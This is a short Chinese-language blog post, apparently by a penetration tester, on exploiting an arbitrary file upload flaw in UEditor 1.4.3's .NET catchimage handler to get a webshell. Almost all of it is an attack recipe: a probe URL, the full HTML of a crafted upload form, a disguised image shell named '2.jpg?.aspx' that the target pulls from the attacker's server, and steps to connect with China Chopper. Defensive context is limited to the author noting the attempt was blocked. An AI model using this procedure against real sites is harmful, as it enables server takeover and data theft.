UEditor 1.4.3 任意文件上傳getshell


今天測試一個項目,進到后台之后發現使用富文本web編輯器

image

首先判斷下是否有這個漏洞

訪問如下鏈接 : http://xxxxxxxxx/ueditor/net/controller.ashx?action=catchimage
如出現

 

 則可嘗試漏洞利用

構造一個惡意的html文件,action的url是我們攻擊地址

<form action="http://xxxxxxxxx/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded"  method="POST">   <p>shell addr:<input type="text" name="source[]" /></p >   <inputtype="submit" value="Submit" />

</form>

然后制作一個圖片馬,文件名改為2.jpg?.aspx上傳至自己的服務器,通過構造的惡意html進行上傳

image

 

可以看到頁面返回狀態和地址

 

 使用菜刀連接

http://xxxxxxxxx/ueditor/net/upload/image/xxxxxx   即可getshell

我的被安全設備攔截了

image

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM